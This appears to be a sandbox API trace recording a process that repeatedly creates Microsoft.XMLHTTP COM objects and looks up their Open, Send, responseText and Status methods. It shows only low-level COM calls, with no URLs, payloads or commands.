	[0939.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7298) returned 0x0
	[0939.568] ??2@YAPEAX_K@Z () returned 0x62f330
	[0939.568] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7298, pUnkSite=0x62f330) 
	[0939.568] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0939.568] XMLHTTPRequest:IUnknown:Release (This=0x49c7298) returned 0x0
	[0939.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0939.568] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0939.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.568] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0939.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0939.569] longjmp () 
	[0939.569] longjmp () 
	[0939.569] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0939.569] SysStringLen (param_1=0x0) returned 0x0
	[0939.569] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0939.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0939.569] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0939.569] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0939.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0939.569] ??2@YAPEAX_K@Z () returned 0x62f310
	[0939.569] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f310) 
	[0939.569] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0939.569] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0939.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0939.569] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0939.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.570] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0939.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0939.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0939.570] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0939.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0940.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0940.159] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0940.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0940.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0940.159] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0940.159] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0947.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0947.313] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0947.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0947.315] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0947.315] SysStringLen (param_1=0x0) returned 0x0
	[0947.315] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0947.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0947.315] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0947.315] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0947.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0947.315] ??2@YAPEAX_K@Z () returned 0x62f310
	[0947.315] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0947.315] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0947.315] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0947.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0947.316] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0947.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.316] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0947.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0947.318] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0947.318] SysStringLen (param_1=0x0) returned 0x0
	[0947.318] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0947.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0947.319] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0947.319] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0947.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0947.319] ??2@YAPEAX_K@Z () returned 0x62f330
	[0947.319] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0947.319] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0947.319] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0947.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0947.319] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0947.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.319] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0947.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0947.320] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0947.320] SysStringLen (param_1=0x0) returned 0x0
	[0947.320] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0947.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0947.320] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0947.320] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0947.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7318) returned 0x0
	[0947.320] ??2@YAPEAX_K@Z () returned 0x62f310
	[0947.320] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7318, pUnkSite=0x62f310) 
	[0947.320] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0947.320] XMLHTTPRequest:IUnknown:Release (This=0x49c7318) returned 0x0
	[0947.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0947.320] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0947.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0947.320] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0947.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0947.321] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0947.321] SysStringLen (param_1=0x0) returned 0x0
	[0947.321] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0947.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0947.321] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7240) returned 0x0
	[0947.321] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0947.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0947.321] ??2@YAPEAX_K@Z () returned 0x62f330
	[0947.321] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0947.321] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0947.321] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
